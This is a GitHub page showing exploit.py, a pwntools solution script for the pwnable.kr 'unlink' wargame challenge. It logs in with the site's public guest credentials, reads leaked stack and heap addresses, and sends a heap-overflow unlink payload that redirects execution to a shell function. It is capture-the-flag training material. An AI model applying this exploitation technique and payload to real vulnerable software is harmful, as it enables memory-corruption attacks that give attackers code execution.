-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
40 lines (36 loc) · 1.27 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
"""
heap overflow vulnerability
when unlink function will be executed, we exchange our pointers
in which we will have an address of heap and address of stack
in the main function we have next instructions that vulnerable in this case:
mov ecx, dword ptr [ebp - 0x4]
lea esp, [ecx - 0x4]
ret
so we will overwrite the return address of main function and execute shell function.
"""
from pwn import *
def exploit():
# connect
s = ssh(user='unlink', host='pwnable.kr', password='guest', port=2222)
p = s.process(executable='./unlink')
# Receive stack address
p.recvuntil('leak: ')
stack_addr = p.recvline().strip()
print(stack_addr)
# Receive heap address
p.recvuntil('leak: ')
heap_addr = p.recvline().strip()
print(heap_addr)
heap_offset = 12
# pack it in byte little endian format and add the offset
heap_addr = struct.pack("<I", int(heap_addr, 16) + heap_offset)
stack_offset = 16
stack_addr = struct.pack("<I", int(stack_addr, 16) + stack_offset)
# address of shell function
sh_addr = p32(0x080484eb)
# address of function + dump + heap address + stack address
payload = sh_addr + b'\x90' * heap_offset + heap_addr + stack_addr
p.sendline(payload)
p.interactive()
if __name__=='__main__':
exploit()